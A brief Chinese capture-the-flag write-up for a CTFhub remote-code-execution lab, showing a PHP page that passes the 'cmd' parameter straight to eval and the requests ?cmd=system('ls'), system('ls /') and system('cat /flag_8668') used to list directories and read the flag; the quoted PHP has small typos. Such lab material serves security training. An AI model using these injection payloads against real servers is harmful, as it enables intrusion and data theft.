CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
Csvn7 小时前
useRef 的 5 个冷门但救命的高级用法
前端
小小小小宇7 小时前
Harness Engineering 与 AI 联动
前端
鱼人7 小时前
HTML5 页面性能优化大全
前端
ping某7 小时前
专栏-null 和 undefined 到底是什么?
前端·javascript·后端
用户900463370407 小时前
5MB vs 4KB vs 无限大:浏览器存储谁更强?
前端
小小小小宇7 小时前
Harness Engineering 全解析与应用
前端
用户128526116028 小时前
我把祖传Java项目重构后,接口响应从3s砍到了200ms,只改了这几行代码
java
牧艺8 小时前
cos-design v3.0:从 15 个 Demo 到 49 个组件的视觉特效库
前端·视觉设计
lichenyang4538 小时前
ASCF 架构升级总览:WebRuntimePage 为什么要变薄
前端
道友可好8 小时前
从今天开始:你的第一个 Harness Engineering 实践
前端·人工智能·后端